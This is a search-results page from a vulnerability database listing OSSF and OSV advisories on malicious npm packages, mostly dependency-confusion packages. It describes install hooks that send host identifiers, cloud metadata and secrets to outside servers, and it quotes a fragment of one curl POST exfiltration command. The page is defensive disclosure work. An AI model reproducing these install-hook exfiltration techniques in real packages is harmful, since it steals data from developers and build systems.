Lucene search
+L

1796 matches found

ossf
ossf
added 2026/07/09 11:20 a.m.11 views

Malicious code in testing-d3do (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6c008bcf9a72a02f11c556396a39d6de999bfad0cfa389ddac01929d19bb34d8 On npm install, this package's postinstall script collects host identifiers os.hostname, os.userInfo, current working directory, and external IPv4...

5.9AI score
Exploits0References1
ossf
ossf
added 2026/07/08 12:20 a.m.11 views

Malicious code in rio-design-tokens (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ed72d8256a1831ef61f01d101c9b9de21db822516cb3b61d1fffd1ef7b3bb0c7 [email protected] is a dependency-confusion attack package. package.json declares preinstall: node index.js, so npm install auto-executes...

5.9AI score
Exploits0References3
ossf
ossf
added 2026/07/05 8:25 p.m.11 views

Malicious code in gen-ai-opt-in (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3653831a01d3068b12688a9f6ae11926a1b1edde27f8f37a6c48f3f0dba99231 On npm install, postinstall.js executes automatically and collects installer host identifiers os.hostname, os.userInfo.username plus public IP/geo da...

5.9AI score
Exploits0References4
ossf
ossf
added 2026/07/05 3:29 p.m.11 views

Malicious code in wsh4-nmp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8f4958e0d564fad3efe079f48b02579eb052190951bc2ce2bf3d8bc067575c36 package.json declares scripts.postinstall = 'node index.js'. On install, index.js unconditionally POSTs installer-identifying data — the absolute...

5.8AI score
Exploits0References2
ossf
ossf
added 2026/07/05 3:16 p.m.12 views

Malicious code in @adobesign/as-dev-tools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6752e4d30c584cb5ca6f67265c983257c1531aa306b47ec00b43ddae83fe2532 The package's package.json declares a postinstall lifecycle hook that pipes the output of whoami through curl to a hardcoded Burp Collaborator...

5.9AI score
Exploits0References2
osv
osv
added 2026/07/02 9:20 p.m.3 views

MAL-2026-6730 Malicious code in ue-automation-scripts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cbc2db9a2a365d53d76fe7ca2a8f219f98118d99b53698cf7ce8b31cf81eda3f Package name 'ue-automation-scripts' with version 99999.0.0 is the canonical dependency-confusion shape used to hijack installs on internal CI system...

6.1AI score
Exploits0References2
osv
osv
added 2026/07/02 9:11 p.m.5 views

MAL-2026-6731 Malicious code in ue-jenkins-buildkite (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f3f4ff9ea00766589ae9dece7648aa4ce29ac9bc82173fce0a1adefaeb6c8f5a [email protected] is a dependency-confusion package targeting an internal Epic Games / Unreal Engine CI namespace name evokes...

6.1AI score
Exploits0References2
ossf
ossf
added 2026/06/30 9:37 a.m.7 views

Malicious code in ripshakti1 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 764edbf390c427ef99a9d9164034b966fbac251f00240bbb219825c0c92422a6 package.json declares a preinstall lifecycle hook node index.js that auto-executes on npm install. index.js queries the AWS EC2 instance metadata...

5.8AI score
Exploits0References1
ossf
ossf
added 2026/06/29 4:0 a.m.9 views

Malicious code in eslint-commit-parser (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5fc51e200a141d1dbbb4f7eb9e5e3dec18507572e5dc9562278713c554fad195 The package is published under the name eslint-commit-parser but its contents are a verbatim copy of the supertest HTTP-testing library — package.jso...

5.8AI score
Exploits0References1
ossf
ossf
added 2026/06/25 10:51 a.m.14 views

Malicious code in dttsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 56d01c47d29d1f8f25a737be42dd77d02a2c13a00afb808740142197a79150e9 package.json declares a postinstall lifecycle script that runs automatically on npm install: curl -X POST -d "$cat /data/logs/monitor-2026-06-25.log"...

6AI score
Exploits0References1
osv
osv
added 2026/06/25 8:39 a.m.9 views

MAL-2026-6459 Malicious code in easy-string-kit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8cb77d96cfd133340395df1765df2426f8414d80158e62ee5832ab6d4a18e803 package.json declares a postinstall lifecycle script that automatically runs on npm install and executes roughly 25 curl POST requests harvesting...

6AI score
Exploits0References8
ossf
ossf
added 2026/06/21 4:4 p.m.14 views

Malicious code in zomato-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

6AI score
Exploits0References1
osv
osv
added 2026/06/21 4:4 p.m.14 views

MAL-2026-6253 Malicious code in zomato-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f0a12373009dd17131e45f4d20570904f2b8074367ee8b121e60a3ce5764fa00 The package's package.json declares a preinstall lifecycle hook that runs curl to POST the installer's hostname, whoami, current working directory, a...

6AI score
Exploits0References1
ossf
ossf
added 2026/06/17 3:46 a.m.14 views

Malicious code in cryptodao-deploy (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5323b2fc30e7603b402729f45345a9c3eb4af8361acaca5d035cc51f9e660cea package.json declares postinstall: node recon.js, which fires automatically on npm install. recon.js enumerates installer-side secrets —...

5.3AI score
Exploits0References1
ossf
ossf
added 2026/06/11 7:15 p.m.14 views

Malicious code in worker-build (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0e11b6161f4fe3c591bddadbf275003eaac33a1478cda408ac51d85230292e6d package.json declares "postinstall": "node main.js", so installation of [email protected] unconditionally executes main.js on npm install. main.js...

5.4AI score
Exploits0References4
osv
osv
added 2026/06/11 7:15 p.m.10 views

MAL-2026-5677 Malicious code in worker-build (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0e11b6161f4fe3c591bddadbf275003eaac33a1478cda408ac51d85230292e6d package.json declares "postinstall": "node main.js", so installation of [email protected] unconditionally executes main.js on npm install. main.js...

5.5AI score
Exploits0References4
ossf
ossf
added 2026/06/11 9:26 a.m.13 views

Malicious code in @whatnot-web/www-legacy (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3fe99986935f0b2d200c3192dfc07fc1b6da96c78ac8a4f0a67aa23771e82709 @whatnot-web/[email protected] is a dependency-confusion shell targeting the Whatnot org scope. The package ships an empty library index.js exports ,...

5.5AI score
Exploits0References2
ossf
ossf
added 2026/06/07 5:44 a.m.15 views

Malicious code in @solana-labs/etherjs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5c086a8d2c3022bc55743fdca944c8810b997ec203e8742606bf14cccee721db Package is published as @solana-labs/etherjs but its README documents itself as @solana-labs/web3.js and instructs consumers to import Connection,...

5.7AI score
Exploits0References8
osv
osv
added 2026/06/03 8:50 a.m.20 views

MAL-2026-5182 Malicious code in brave-search-mcp-server (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis d7d65e78a73a4cc2064d0ab9210a76c7c55f69553b70879dd649d7ad84e48dc0 The OpenSSF Package Analysis project identified 'brave-search-mcp-server' @ 1.0.0 npm as malicious. It is considered malicious because: - The...

5.8AI score
Exploits0
ossf
ossf
added 2026/06/02 5:30 p.m.17 views

Malicious code in fundraiserserv (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c27dec042a9f69f24c1a2c860af27a2625740dbd7b7fc3d059659fae6f628c25 The OpenSSF Package Analysis project identified 'fundraiserserv' @ 1.0.0 npm as malicious. It is considered malicious because: - The package...

5.8AI score
Exploits0
Rows per page
Query Builder